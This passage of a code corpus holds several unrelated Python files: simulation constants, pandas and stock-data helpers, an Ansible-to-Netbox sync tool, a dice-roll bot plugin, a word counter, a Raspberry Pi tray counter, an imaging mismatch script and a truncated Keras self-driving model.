Copy value in heap address to stack\n 'STP', # STP Reg ; Copy value pointed by register to stack\n 'LDP', # LDP Reg ; Copy value in stack to memory address pointed by register\n 'MOV', # Sets the COMM register to MOV\n 'MOVA', # Sets the COMM register to MOV AWAY\n 'SRFD', # Sets the COMM register to SEARCH FOOD. Pushes direction to the stack\n 'SRBG', # Sets the COMM register to SEARCH BUG. Pushes direction to the stack\n 'ATK', # Attacks one bug in the same location\n 'SHR', # Shares energy with bus in the same location\n 'ADD', # Adds the two numbers in the stack. Stores the result in the stack\n 'MUL', # Multiplies the two numbers in the stack. Stores the result in the stack\n 'DIV', # Pops A, Pops B, Divides A into B. If B is zero does nothing\n 'JMF', # JMF n ; Jumps the PC forward n memory addresses\n 'JMB', # JMB n ; Jumps the PC backward n memory addresses\n 'JZ' , # JZ address ; Jumps to the address in the CODE memory if stack is zero\n 'JNZ' , # JNZ address ; Jumps to the address in the CODE memory if stack is not zero\n]\n\n# Step return values\nRETOK=0\nRETDEAD=1 # list of identifiers of dead bugs\nRETOFFS=2 # list of offspringed bugs\n\n\n# *************** WORLD CONSTANTS ***************\n\n# side of the world\n#BOARDSIZE=50\n#BOARDSIZE=200\n#BOARDWIDTH=4\n#BOARDHEIGHT=2\nBOARDWIDTH=200\nBOARDHEIGHT=200\n\n\n\n# Food per cell\nFOODPACK=10\n\n\n# Index in the sowratevalues of initial sowrate\n#SOWRATE=4\nSOWRATE=0\n\nMUTRATE=1 # percentage\nSTDDEV=10 # percentage\n\n\n# *************** GUI CONSTANTS ***************\n\n# Dimensions of the window looking at the map (<= as boardsize)\n#TILESWIDTH=BOARDWIDTH\n#TILESHEIGHT=BOARDHEIGHT\nTILESWIDTH=50\nTILESHEIGHT=50\nTILESIZE=10\n\nMAPWIDTH=TILESWIDTH*TILESIZE\nMAPHEIGHT=TILESHEIGHT*TILESIZE\nMARGIN=4\n\nHSCROLLHEIGHT=20\nCONTROLWIDTH=200\nCONTROLHEIGHT=MAPHEIGHT+HSCROLLHEIGHT\n\n\n\nWINWIDTH=MAPWIDTH+CONTROLWIDTH\nWINHEIGHT=MAPHEIGHT+HSCROLLHEIGHT\n\n\nCONSOLEHEIGHT=150\nINFOWIDTH=75\n\nRED=(255,0,0)\nORANGE=(255,165,0)\nYELLOW=(255,255,0)\nGREEN=(0,205,0)\nBROWN=(153,76,0)\nWHITE=(255,255,255)\nPINK=(250,20,147)\nBLACK=(0,0,0)\n\nHERBCOLOR=YELLOW\nCARNCOLOR=BLACK\nOMNICOLOR=PINK\n\n\n\n\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"603075165","text":"from pandas import DataFrame\nimport logging\nimport sys\n\n\ndef create_dataFrame_from_csv(csv_path, delimiter, *columns):\n \"\"\"\n Creates a pandas dataFrame from a .csv.\n Used the passed column names as header for each column, order of passed columns must be equal to the order inside the csv.\n Dynamically detect how much columns passed and splits .csv accordantly. Splits at passed delimiter.\n\n Parameters\n ----------\n csv_path : str\n Path to csv file which should be transformed to an panda dataframe\n delimiter : str\n Delimiter of the .csv file\n columns : str\n Captions of the panda dataframe. The module divides the individual lines of the .csv at the delimiter \n and stores them in the dataframe, based on the number of captions passed.\n\n Returns\n -------\n Pandas dataframe\n Panda dataframe created from passed .csv\n \"\"\"\n\n # read csv into var\n with open(csv_path, 'r') as file:\n csv_data = file.read()\n\n # Split csv at linebreaks to get each entry alone\n data_array = csv_data.split('\\n')\n\n # Init lists for dataframe creation\n # Lists in list for simple loop through later\n lists = []\n for n in range(len(columns)):\n lists.append([])\n\n # For each entry (line) in csv...\n for entry in data_array:\n if entry != '': # Only if line is not empty\n # split at {delimiter} and add value to the lists\n # Loop through columns, so dynamically assign as many 'splits' as needed (based on amount of columns)\n for n in range(len(columns)):\n lists[n].append(entry.split(delimiter)[n])\n\n # Create dynamically the raw_data dictionary\n raw_dataframe = {}\n for idx, val in enumerate(columns):\n # For each column passes, add the previous created list with all values to the dictionary with the passed column name as key\n raw_dataframe[val]=lists[idx]\n\n # Creating dataframe from raw_dataframe\n df = DataFrame (raw_dataframe, columns = columns)\n\n return df\n\ndef add_column_to_df(df, header_name):\n \"\"\"\n Adds a new column with the passed header name to the passed dataframe\n \n Parameters\n ----------\n df : pandas dataframe\n dataframe which should get the new column\n header_name : str\n Header of the new column\n\n Returns\n -------\n pandas dataframe\n Passed dataframe with the new column added\n \"\"\"\n df[header_name] = ''\n return df","sub_path":"modules/handling_pandas.py","file_name":"handling_pandas.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"234448252","text":"# _*_coding:utf-8_*_\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom config import Arg\n\nargs = Arg()\n\n\"\"\"\n以涨幅度为依据,给单支股票加标签\n参数:\n code:股票代码\n返回值:\n 添加了标签的股票数据\n\"\"\"\n\n\ndef addLabelToSingleStock(code):\n data = pd.read_csv(args.hs300path + code + '.csv') # 读取数据\n data = data[['open', 'low', 'high', 'close', 'volume', 'p_change']].copy()\n m = data.shape[0]\n data['label'] = np.zeros((m, 1)) # 初始化标签列 0\n\n for i in range(m):\n p_change = data['p_change'].iloc[i]\n if p_change > 0:\n data['label'].iloc[i] = 1\n else:\n data['label'].iloc[i] = -1\n data.drop(['p_change'], axis=1)\n return data\n\n\n\"\"\"\n划分训练集和测试集\n参数:\n dataMax:股票数据集\n返回值:\n X_train:训练集特征矩阵\n Y_train:训练集标签矩阵\n X_test:测试集特征矩阵\n Y_test: 测试集标签矩阵\n\"\"\"\n\n\ndef split_train_test(dataMax):\n # X:特征列,Y:标签列\n X = dataMax.iloc[:, :-1].values\n Y = dataMax.iloc[:, -1].values\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n # 将数据集转化为矩阵\n X_train = np.mat(X_train)\n X_test = np.mat(X_test)\n Y_train = np.mat(Y_train).T\n Y_test = np.mat(Y_test).T\n return X_train, Y_train, X_test, Y_test\n\n\n\"\"\"\n从已下载的数据中获取指定时间点的股票数据,并合并成一个dataframe\n添加标签\n\"\"\"\n\n\ndef merge_day_data(time):\n # 读取股票基本信息文件,获取股票代码列表\n pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n day_stock = pd.DataFrame()\n for code in pool.ts_code:\n path = '../data/mark_yield/' + code + '.csv'\n df = pd.read_csv(path, index_col='trade_date', parse_dates=True)\n df = df.sort_values('trade_date')\n df = df[['ts_code', 'open', 'high', 'low', 'close', 'pre_close', 'change', 'pct_chg', 'vol', 'amount', 'yield']]\n data = df[time:time]\n if data is not None:\n day_stock = pd.concat([day_stock, data])\n day_stock = day_stock.sort_values(by='yield', ascending=False)\n l = len(day_stock)\n day_stock = pd.concat([day_stock[:int(0.25 * l)], day_stock[int(0.75 * l):]])\n m = day_stock.shape[0]\n day_stock['label'] = np.ones((m, 1))\n for i in range(m):\n if i > len(day_stock) / 2 - 1:\n day_stock['label'].iloc[i] = -1\n return day_stock\n\n\n\"\"\"\n根据上交所交易日历,每隔20个交易日获取已下载的股票数据到指定文件中\n\"\"\"\n\n\ndef download_time_set():\n # 获取上交所交易日期\n cal_date = pd.read_csv('../data/trade_cal/trade_cal_sse.csv')\n # 以20个交易日为时间间隔,取当前时间的前十四个时间点\n cal_date = cal_date[cal_date.is_open == 1]['cal_date'][::20][14:29]\n for dt in cal_date:\n df = merge_day_data(str(dt))\n path = '../data/day_stock_process/' + str(dt) + '.csv'\n df.to_csv(path)\n\n\n\"\"\"\n标注股票未来20日的收益率,并存入文件中\n\"\"\"\n\n\ndef mark_stock_yield():\n pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n for code in pool.ts_code:\n df = pd.read_csv('../data/stock_basic/' + code + '.csv')\n m = df.shape[0]\n df['yield'] = np.zeros((m, 1))\n df['yield'] = np.round((df['close'].shift(-20) - df['close']) / df['close'], 2)\n df.to_csv('../data/mark_yield/' + code + '.csv', index=0)\n\n\n\"\"\"\n标注沪深300指数数据未来20天的收益率\n\"\"\"\n\n\ndef mark_hs300_yield():\n df = pd.read_csv('../data/index_data/399300.csv')\n m = df.shape[0]\n df['yield'] = np.zeros((m, 1))\n df['yield'] = np.round((df['close'] - df['close'].shift(20)) / df['close'], 2)\n df.to_csv('../data/index_data/399300.csv', index=0)\n","sub_path":"util/dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345083779","text":"\n#!/opt/XXXXX/utils/XXXXX-python/python3/bin/python3\n\nimport json\nimport argparse\nimport pynetbox\nimport re\nimport os\nimport logging\nfrom ipaddress import IPv4Network\n\n#logging.basicConfig(filename='netbox_sync.log',level=logging.DEBUG)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\nparser = argparse.ArgumentParser()\nparser = argparse.ArgumentParser(description='Tool that updates hosts on Netbox')\nparser.add_argument(\"--hostname\", help=\"Host to update\", type=str, required=False)\nparser.add_argument(\"--config\", help=\"JSON Configuration file that contains Auth Token and Server URL values\", type=str, required=True)\nparser.add_argument(\"--factpath\", help=\"Folder path containing output from netbox\", required=True)\nargs = parser.parse_args()\n\nignore_interfaces = ['lo', 'usb.*', '.*tun.*']\nregex_filter = \"(\" + \")|(\".join(ignore_interfaces) + \")\"\n\n\nVMvaluemapping= {\n #Ansible Tree Key : #Netbox Key\n 'ansible_processor_vcpus': 'vcpus',\n 'ansible_memtotal_mb': 'memory',\n 'ansible_processor_threads_per_core': { 'custom_fields': 'hyperthreading'},\n 'ansible_processor_count': { 'custom_fields': 'cpusockets'},\n 'ansible_kernel': { 'custom_fields': 'kernel'},\n 'ansible_distribution_version': { 'custom_fields': 'linuxdistribution'},\n 'ansible_dns' : { 'nameservers': {'custom_fields':'dnsservers'}, 'search': {'custom_fields' : 'dnssearch'}}\n}\n\nHDvaluemapping = {\n #Ansible Tree Key : #Netbox Key\n 'ansible_processor_cores': { 'custom_fields': 'cores' },\n 'ansible_memtotal_mb': { 'custom_fields': 'memory' },\n 'ansible_processor_threads_per_core': { 'custom_fields': 'hyperthreading'},\n 'ansible_processor_count': { 'custom_fields': 'cpusockets'},\n 'ansible_product_serial': 'serial',\n 'ansible_kernel': { 'custom_fields': 'kernel'},\n 'ansible_distribution_version': { 'custom_fields': 'linuxdistribution'},\n 'ansible_dns' : { 'nameservers': {'custom_fields':'dnsservers'}, 'search': {'custom_fields' : 'dnssearch'}}\n}\n\nlocal_valuemapping = {\n #file.fact name :{ netbox_field_name }\n 'dnsalias' : 'custom_fields',\n 'onload' : 'custom_fields'\n}\n\nwith open(f'{args.config}') as config_file:\n config = json.load(config_file)\n\nnb = pynetbox.api(config['api_endpoint'], token=f'{config[\"token\"]}')\n\n\ndef parse_json(filepath):\n logging.debug(f'Parsing: {filepath}')\n hostinfo = ''\n try:\n with open(f'{args.factpath}/{filepath}') as f:\n hostinfo = json.load(f)\n except Exception as e:\n logging.critical(f'{filepath} WAS UNABLE TO BE LOADED')\n \n return hostinfo\n\n\n\n\ndef update_host(hostname, values):\n logging.info(f'Starting to gather update values for {hostname}')\n try:\n logging.debug(values['ansible_product_name'])\n except:\n logging.critical(f'Couldnt grab ansible_product_name from {hostname}, skipping')\n return\n updatedict = {}\n valuemapping = {}\n\n if 'VMware' in values['ansible_product_name'] or 'Virtual' in values['ansible_product_name']:\n valuemapping = VMvaluemapping\n nbhost = nb.virtualization.virtual_machines.get(name=hostname)\n else:\n valuemapping = HDvaluemapping\n nbhost = nb.dcim.devices.get(name=hostname)\n \n try:\n nbdict = dict(nbhost)\n #logging.debug(nbdict)\n except:\n logging.critical(f'Error getting {hostname} from netbox - NOT UPDATING.')\n badhosts.append(hostname)\n return\n for v in values:\n #Ansible local values have special recursion\n if 'ansible_local' in v:\n local_values = values[v]\n logging.debug(f'Local Values: {local_values}')\n for local_fact in local_values:\n if local_fact in local_valuemapping:\n logging.debug(f'Found local fact {local_fact}, value {local_values[local_fact][\"main\"]}')\n #strip this stupid big dictionary down to something manageable \n for fact_key, fact_value in local_values[local_fact]['main'].items():\n logging.debug(f'{fact_key} {fact_value}')\n mapping_key = local_valuemapping[local_fact]\n if mapping_key not in updatedict:\n updatedict[mapping_key] = nbdict[key]\n logging.debug(f'Copied current {mapping_key} to updatedict for modification: {updatedict[mapping_key]}')\n nbvalue = nbdict[mapping_key][fact_key]\n logging.debug(f'Current netbox value was {nbvalue}')\n if fact_value != nbvalue:\n logging.info(f'Values Differ, Updating dictionary')\n updatedict[mapping_key].update({ fact_key : fact_value })\n continue\n if v in valuemapping:\n if type(valuemapping[v]) == dict and len(valuemapping[v]) == 1:\n #We need to submit the FULL dictionary back to netbox, or any manually entered stuff will be deleted when we update\n for key, value in valuemapping[v].items():\n logging.debug(f'Working with key: {key}')\n if key not in updatedict:\n updatedict[key] = nbdict[key]\n logging.debug(f'Copying current {key} to updatedict for modification: {updatedict[key]}')\n logging.debug(value)\n nbvalue = nbdict[key][value] \n elif type(valuemapping[v]) == dict and len(valuemapping[v]) > 1:\n logging.debug('Working with an ansible key that has children.')\n child_values = values[v]\n logging.debug(f'{child_values}')\n for dictionarykey, dictionaryvalue in valuemapping[v].items():\n #nameservers: {custom_fields, dns servers}\n if not dictionarykey in child_values:\n logging.debug(f'Did not find {dictionarykey} in child_values: {child_values}')\n continue\n for childkey, childvalue in valuemapping[v][dictionarykey].items():\n #custom_fields, dnsservers\n if childkey not in updatedict:\n updatedic[childkey] = nbdict[childkey]\n nbvalue = nbdict[childkey][childvalue]\n \n logging.debug(f'ChildKey: {childkey} ChildValue: {childvalue} AnsibleValue: {child_values[dictionarykey]} NetboxValue: {nbvalue}')\n if nbvalue != child_values[dictionarykey]:\n updatedict[childkey].update({ childvalue : child_values[dictionarykey] })\n continue\n else:\n nbvalue = nbdict[valuemapping[v]]\n \n\n logging.debug(f'Found Value {v} mapping to {valuemapping[v]}\\nCurrent Netbox Value (to be overwritten): {nbvalue}')\n if values[v] != nbvalue:\n if type(valuemapping[v]) == dict:\n for key, value in valuemapping[v].items():\n if key in updatedict:\n updatedict[key].update({ value : values[v]})\n else:\n updatedict[key] = { value : values[v]}\n else:\n updatedict[valuemapping[v]] = values[v]\n logging.info(f'Updating {hostname}')\n logging.debug(f'{updatedict}')\n nbhost.update(updatedict)\n \ndef update_ip(hostname, values):\n vm = False\n if 'VMware' in values['ansible_product_name'] or 'Virtual' in values['ansible_product_name']:\n nbhost = nb.virtualization.virtual_machines.get(name=hostname)\n vm = True\n else:\n nbhost = nb.dcim.devices.get(name=hostname)\n\n\n for interface in values['ansible_interfaces']:\n if not re.match(regex_filter, interface):\n logging.debug(f'Tring {interface}')\n key = 'ansible_' + interface\n if key in values:\n logging.debug(f'Found ansible interface {key}')\n\n if 'ipv4' not in values[key]:\n logging.debug(f'{key} doesnt have an IP address. We dont care about it')\n continue\n\n ###################### INTERFACE CREATION / UPDATING\n interfacedic = {\n 'name': f'{interface}',\n 'enabled': f'{values[key][\"active\"]}',\n 'mtu': f'{values[key][\"mtu\"]}',\n 'mac_address': f'{values[key][\"macaddress\"]}'\n }\n if vm:\n interfacedic['virtual_machine'] = { 'id' : nbhost.id }\n\n if not nb.virtualization.interfaces.get(virtual_machine_id=f'{nbhost.id}',name=f'{interface}'):\n logging.info(f'Creating a virutal interface with {interfacedic}')\n nb.virtualization.interfaces.create(interfacedic)\n nbiface = nb.virtualization.interfaces.get(virtual_machine_id=f'{nbhost.id}',name=f'{interface}')\n\n else:\n interfacedic['device'] = { 'id' : nbhost.id }\n if not nb.dcim.interfaces.get(device_id=f'{nbhost.id}',name=f'{interface}'):\n logging.info(f'Creating a physical interface with {interfacedic}')\n nb.dcim.interfaces.create(interfacedic)\n nbiface = nb.dcim.interfaces.get(device_id=f'{nbhost.id}',name=f'{interface}')\n logging.debug(f'Interface Info: {dict(nbiface)}')\n\n\n ############# IP ADDRESS CREATION \n networkinfo = {}\n index = 0\n networkinfo = { 'network100' : {'ip': values[key]['ipv4']['address'], 'mask' : convert_tocidr(values[key]['ipv4']['netmask'])} }\n\n if 'ipv4_secondaries' in values[key]:\n logging.debug(f'{key} has multiple addresses assigned to it')\n for secondary in values[key]['ipv4_secondaries']:\n networkinfo[f'network{index}'] = { 'ip' : values[key]['ipv4_secondaries'][index]['address'], 'mask' : convert_tocidr(values[key]['ipv4_secondaries'][index]['netmask']) }\n index+=1\n\n logging.debug(networkinfo)\n for k, v in networkinfo.items():\n ipdic = {\n 'address' : f'{networkinfo[k][\"ip\"]}/{networkinfo[k][\"mask\"]}',\n 'interface' : { 'id' : nbiface.id }\n }\n try:\n nbip = nb.ipam.ip_addresses.get(address=networkinfo[k][\"ip\"])\n except ValueError:\n logging.critical(f'DUPLICATE IP DETECTED {networkinfo[k][\"ip\"]}')\n continue\n \n if not nbip:\n logging.info(f'{hostname}: Adding {networkinfo[k][\"ip\"]}/{networkinfo[k][\"mask\"]} to netbox')\n nb.ipam.ip_addresses.create(ipdic)\n elif ('interface' in nbip) and (nbip.interface.id != nbiface.id):\n logging.warning(f'{hostname}: IP Detected, but interfaces differ. Found: {nbip.interface.id} Interface: {nbiface.id}')\n nbip.interface.id = nbiface.id\n nbip.save()\n else:\n nbip.save()\n\n\n \ndef convert_tocidr(mask):\n return IPv4Network(f'0.0.0.0/{mask}').prefixlen\n\ndef work_onhost(hostname):\n hostvalues = parse_json(hostname)\n if 'ansible_facts' not in hostvalues:\n logging.critical(f'{hostname} ANSIBLE dump is invalid') \n badhosts.append(hostname)\n return\n #trim the dict down a little to make it easier to work with\n hostvalues = hostvalues['ansible_facts']\n update_host(hostname, hostvalues)\n update_ip(hostname, hostvalues)\n\nbadhosts = []\ndef main():\n if args.hostname:\n work_onhost(args.hostname)\n else:\n files = os.listdir(args.factpath)\n for f in files:\n work_onhost(f)\n if len(badhosts) > 0:\n logging.critical('HOSTS WITH PROBLEMS:\\n{}'.format(*badhosts, sep=\"\\n\"))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sync_ansible_netbox.py","file_name":"sync_ansible_netbox.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"239574075","text":"##1dbdc6da34094db4e661ed43aac83d91\nimport traceback\nimport random\n\ndef diceroll(self):\n\ttry:\n\t\tsource = self.source.character\n\t\tb = self.args[0].lower().split(\"d\")\n\t\tc = b[1].split(\"+\")\n\t\tif self.params.lower().find(\"dc\")!=-1:\n\t\t\tdcmode = True\n\t\t\ttry:\n\t\t\t\tDC = int(self.args[2])\n\t\t\texcept:\n\t\t\t\tself.say(\"Cannot roll to DC '{}'. Syntax: '.d <>d<>+<> DC <>'\".format(a), 0)\n\t\t\t\treturn\n\t\telse:\n\t\t\tdcmode = False\n\t\t\t\n\t\ttry:\n\t\t\tb[0] = int(b[0])\n\t\t\tc[0] = int(c[0])\n\t\t\tc[1] = int(c[1])\n\t\texcept IndexError:\n\t\t\tc=[c[0], 0]\n\t\texcept ValueError:\n\t\t\tself.say(\"Invalid input. (Not a number?)\", 0)\n\t\tif not (b[0]>15) or (c[0]>100) or (c[1]>25):\n\t\t\tresults = []\n\t\t\tfor x in range(b[0]):\n\t\t\t\tresults.append(random.choice(range(1, c[0]+1))+c[1])\n\t\t\tif not dcmode:\n\t\t\t\tself.say(\"{} rolled {}d{}+{} => {}, total {}\".format(source, b[0], c[0], c[1], results, sum(results)), 2)\n\t\t\telse:\n\t\t\t\tdclist = []\n\t\t\t\tfor x in results:\n\t\t\t\t\tif x > DC:\n\t\t\t\t\t\tdclist.append(\"Success\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tdclist.append(\"Failure\")\n\t\t\t\tself.say(\"Rolling {}d{}+{}, DC {} => {!s}\".format(b[0], c[0], c[1], DC, dclist), 2)\n\t\telse:\n\t\t\tself.say(\"Out of range - only support up to 15d100+25\")\n\texcept Exception as error:\n\t\tself.writeLog(\"Error in module diceroll: {}\".format(error), 3)\n\t\tself.say(\"There has been an error during diceroll execution. We apologize.\", self.access_type)\n\t\ttraceback.print_exc()\n\ndef __init__(self):\n\ttry:\n\t\tself.functions['.d']=(\"diceroll\", 2, [0,1,2])\n\t\tself.helpDict[\".d\"]=\"Rolls a die. Usage .r d(+) (DC d), e.g. .r 3d6+5 DC 4\"\n\texcept:\n\t\tself.writeLog(\"Error initializing plugin 'diceroll'\", 2)\n\t\tself.noteError()\n\t\ttraceback.print_exc()","sub_path":"plugins/diceroll.py","file_name":"diceroll.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291192536","text":"import string\nimport pprint\n\nwith open(r\"D:\\hhgttg.txt\", \"r\") as f:\n content = f.read().lower()\n\nwith open(r\"D:\\skip_words.txt\", \"r\") as f:\n skip_words = f.read().lower().split()\n\nlist_word = content.split()\nprint(len(list_word))\nprint(len(skip_words))\n\n\nword_stats = {}\nfor word in list_word:\n word = word.strip(string.punctuation)\n if not word in skip_words:\n if word in word_stats:\n word_stats[word] += 1\n else:\n word_stats[word] = 1\n\n\n\n# pprint.pprint(word_stats)\nfor key in sorted(word_stats, key=word_stats.get, reverse=True):\n print(\"%s:\\t%s\" % (key, word_stats[key]))","sub_path":"lesson_files.py","file_name":"lesson_files.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519034660","text":"import logging as log\nimport os\nimport webview\nfrom gpiozero import LineSensor\n\n# file paths\nLOG_FILE_PATH = \"debug.log\"\nHTML_FILES = \"assets/index.html\"\nWINDOW_WIDTH = 1400\nWINDOW_HEIGHT = 700\nGPIO_PIN = 17\n\n# class to interact with js in web page\nclass Api:\n def __init__(self):\n self._count = 0\n self._foundTray = False\n self._sensor = None\n self._window = None\n\n def setupSensor(self):\n self._sensor = LineSensor(GPIO_PIN)\n self._sensor.when_activated = self.beginTray\n self._sensor.when_deactivated = self.endTray\n\n def setupWindow(self):\n self._window = webview.create_window(\"\", HTML_FILES, js_api=api, width=WINDOW_WIDTH, height=WINDOW_HEIGHT, fullscreen=True)\n\n def setCount(self, count):\n prev_count = self._count\n if count>=0 and count<999:\n self._count = count\n log.info(\"Count has changed from %i to %i\", prev_count, self._count)\n\n def beginTray(self):\n self._foundTray = True\n log.debug(\"Starting tray at %i trays left\", self._count)\n\n def endTray(self):\n if self._foundTray:\n log.debug(\"Ending tray at %i trays left\", self._count)\n self.updateCount()\n self._foundTray = False\n else:\n log.debug(\"Weird tray detection at the beginning but not at the end\")\n\n def updateCount(self):\n prev_count = self._count\n self._count -= 1\n\n js_code = r\"\"\"\n var calcText = document.getElementById('calc-textbox');\n calcText.value = '{}';\n \"\"\".format(self._count)\n self._window.evaluate_js(js_code)\n\n log.debug(\"Count has decreased from %i to %i\", prev_count, self._count)\n\n def getWifiStatus(self):\n try:\n url = \"https://www.google.com\"\n requests.get(url)\n return {'status': True}\n except:\n return {'message': False}\n\n def turnOff(self):\n print(\"Starting shut down on current device\")\n\n def stopAPI(self):\n pass\n\n# initialize class\napi = Api()\n\ndef configure_logging(logfile):\n log.basicConfig(filename=logfile, \n level=log.DEBUG, \n format='%(asctime)s %(message)s', \n datefmt='%m/%d %I:%M:%S')\n\ndef start_hardware():\n log.debug(\"Starting Hardware\")\n api.setupSensor()\n\ndef start_webpage():\n log.debug(\"Starting Webpage\")\n api.setupWindow()\n webview.start(gui='gtk')\n\ndef stop():\n api.stopAPI()\n\nif __name__ == '__main__':\n configure_logging(LOG_FILE_PATH)\n start_hardware()\n start_webpage()\n stop()\n main()\n","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"287439301","text":"'''\n\nCalc mismatch\n2019-12-16\nby Yupei\n\n'''\nimport SimpleITK as sitk\nimport numpy as np\nimport os \n\nthreshold = 6\nresults_path = './results'\n\nrbf_path = os.path.join(results_path,'maps/rbf_map.nii')\nttp_path = os.path.join(results_path,'maps/ttp_map.nii')\n\nimg_rbf = sitk.ReadImage(rbf_path)\narr_rbf = sitk.GetArrayFromImage(img_rbf)\nprint(arr_rbf.max(), arr_rbf.min())\n\nimg_ttp = sitk.ReadImage(ttp_path)\narr_ttp = sitk.GetArrayFromImage(img_ttp)\nprint(arr_ttp.max(), arr_ttp.min())\n\n(height, width, length) = arr_ttp.shape\n\n# mismap = np.zeros(arr_ttp.shape)\nmap1 = np.zeros(arr_rbf.shape)\nmap2 = np.zeros(arr_ttp.shape)\n\n\nthresh = arr_rbf.max()*0.3\n# print(thresh)\nflag_1 = arr_rbf < thresh\nmap1[flag_1] = 1 \n\nflag1 = arr_rbf <= 1 # Where values are low\nmap1[flag1] = 0 # All low values set to 1 \n\nflag2 = arr_ttp > threshold # Where values are low \nmap2[flag2] = 1 # All low values set to 0 \n\n# print(type(flag2))\n# print(flag2.shape)\n# print(flag2)\nvol_rbf = 0\nvol_tmax = 0 \nfor z in range(height):\n\tfor x in range(width):\n\t\tfor y in range(length):\n\t\t\tif flag1[z, x, y] == True:\n\t\t\t\t# print(z, x, y)\n\t\t\t\tvol_rbf+=1\n\t\t\tif flag2[z, x, y] == True:\n\t\t\t\t# print(z, x, y)\n\t\t\t\tvol_tmax+=1\nprint(vol_rbf)\t\t\t\t\nprint(vol_tmax)\n\n\n\ndiff = vol_rbf - vol_tmax\nratio = vol_rbf/vol_tmax \nprint('Diff: {}'.format(diff))\nprint('Ratio: {:.2f}'.format(ratio))\n\nmismap = map1-map2\nmismap = sitk.GetImageFromArray(mismap) \nmap1 = sitk.GetImageFromArray(map1)\nmap2 = sitk.GetImageFromArray(map2)\n\n\n# sitk.WriteImage(mismap, os.path.join(results_path,'mismatch/rbf_mismap.nii')) \nsitk.WriteImage(map1, os.path.join(results_path,'mismatch/map1.nii'))\nsitk.WriteImage(map2, os.path.join(results_path,'mismatch/map2.nii'))\nsitk.WriteImage(mismap, os.path.join(results_path,'mismatch/mismap.nii'))\n\n\n\n\n","sub_path":"mismatch.py","file_name":"mismatch.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"12573278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 23 13:38:19 2017\n\n@author: Yunshi_Zhao\n\"\"\"\nimport csv\nimport cv2\nimport numpy as np\nimport random\nimport sklearn\nfrom sklearn.model_selection import train_test_split\n\n#load all log files\nlines = []\nfiles = ['../sim_data/driving_log.csv',\n '../sim_data/driving_log_recovery.csv',\n '../sim_data/driving_log_recovery2.csv',\n '../sim_data/driving_log_sample.csv']\n\nfor file in files:\n with open(file) as f:\n reader = csv.reader(f)\n for line in reader:\n if (float(line[3]) < 0.1 and float(line[3]) > -0.1) and random.uniform(0,1) > 0.05:\n continue\n lines.append(line)\n\n# split data into training set and validation set \ntrain_samples, validation_samples = train_test_split(lines) \n\n# generator for calling data one each time during training/validation\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1:\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_sample = samples[offset:offset+batch_size]\n \n images = []\n measurements = [] \n for line in batch_sample:\n measurement = float(line[3])\n # correction factor for left and right images\n correction = 0.2 + random.uniform(-0.05,0.05)\n \n center = line[0].split(\"\\\\\")[-1]\n left = line[1].split(\"\\\\\")[-1]\n right = line[2].split(\"\\\\\")[-1]\n img_center = cv2.imread('../sim_data/IMG/'+center)\n img_left = cv2.imread('../sim_data/IMG/'+left)\n img_right = cv2.imread('../sim_data/IMG/'+right)\n \n # augment picture by flipping it\n img_flip = np.fliplr(img_center)\n \n images.append(img_center)\n images.append(img_left)\n images.append(img_right)\n images.append(img_flip)\n \n measurements.append(measurement)\n measurements.append(measurement+correction)\n measurements.append(measurement-correction)\n measurements.append(-measurement)\n \n X_train = np.array(images)\n y_train = np.array(measurements)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n#generator for training/validation\ntrain_generator = generator(train_samples)\nvalidation_generator = generator(validation_samples)\n\n# model architecture\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, Activation\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.regularizers import l2\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU, ELU\n\nmodel = Sequential()\n#act = LeakyReLU(alpha=0.05)\n#act = Activation('relu')\nact = ELU(alpha=0.05)\n# normalization\nmodel.add(Lambda(lambda x: x/255.0 - 0.5, input_shape=(160, 320, 3)))\n# cropping images\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\n# 5 CNN layers\n# first layer has L2 regularizer to prevent overfitting\nmodel.add(Convolution2D(24,5,5,subsample=(2,2),W_regularizer=l2(0.001)))\nmodel.add(act)\nmodel.add(Convolution2D(36,5,5,subsample=(2,2)))\nmodel.add(act)\nmodel.add(Convolution2D(48,5,5,subsample=(2,2)))\nmodel.add(act)\nmodel.add(Convolution2D(64,3,3))\nmodel.add(act)\nmodel.add(Convolution2D(64,3,3))\nmodel.add(act)\n# 4 FC layers with 50% 